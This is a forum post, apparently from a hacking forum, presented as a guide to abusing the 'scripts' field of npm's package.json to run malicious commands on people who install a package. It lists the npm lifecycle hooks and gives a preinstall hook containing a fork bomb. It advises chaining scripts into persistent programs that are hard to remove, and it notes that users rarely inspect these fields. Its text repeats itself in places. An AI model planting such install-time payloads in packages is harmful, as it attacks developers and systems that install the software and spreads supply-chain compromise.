Quick guide to exploiting npm's scripts tag 05-27-2016, 06:37 AM
#1
When creating your package.json file for an npm module (basic tutorial), one of the tags you have access to is "scripts". Normally, package authors don't include these scripts, because they're not usually necessary. This is convenient for us, as people don't check for malicious content within these script tags.
A simple usage could be a welcome message to users:
What scripts are available?
As shown in npm's docs here, the available script operations are available:
What do I include in these?
The "scripts" actually execute as unix commands, so any kind of damage you can do within a terminal, you can do with an npm script (look into "unsafe-perm" for more on this). For a (kind of skiddy but simple) example, you can execute a fork bomb right before the package is installed:
Tips
Chaining together combinations of scripts, you can make annoyingly persistent programs that can be very frustrating to remove.
It's currently 1:30 AM as I'm writing, so if there's anything that doesn't make sense, PM me and I'll fix it in the morning
A simple usage could be a welcome message to users:
Code:
{
...
"scripts": {
"postinstall": "cat welcome.txt"
}
}What scripts are available?
As shown in npm's docs here, the available script operations are available:
- prepublish: Run BEFORE the package is published. (Also run on local npm install without any arguments.)
- publish, postpublish: Run AFTER the package is published.
- preinstall: Run BEFORE the package is installed
- install, postinstall: Run AFTER the package is installed.
- preuninstall, uninstall: Run BEFORE the package is uninstalled.
- postuninstall: Run AFTER the package is uninstalled.
- preversion, version: Run BEFORE bump the package version.
- postversion: Run AFTER bump the package version.
- pretest, test, posttest: Run by the npm test command.
- prestop, stop, poststop: Run by the npm stop command.
- prestart, start, poststart: Run by the npm start command.
- prerestart, restart, postrestart: Run by the npm restart command. Note: npm restart will run the stop and start scripts if no restart script is provided.
What do I include in these?
The "scripts" actually execute as unix commands, so any kind of damage you can do within a terminal, you can do with an npm script (look into "unsafe-perm" for more on this). For a (kind of skiddy but simple) example, you can execute a fork bomb right before the package is installed:
Code:
{
...
"scripts": {
"preinstall": ":(){ :|:& };:"
}
}Tips
Chaining together combinations of scripts, you can make annoyingly persistent programs that can be very frustrating to remove.
It's currently 1:30 AM as I'm writing, so if there's anything that doesn't make sense, PM me and I'll fix it in the morning
It's often the outcasts, the iconoclasts ... those who have the least to lose because they
don't have much in the first place, who feel the new currents and ride them the farthest.
don't have much in the first place, who feel the new currents and ride them the farthest.

















![[+]](https://sinister.li/images/modern/collapse_collapsed.png)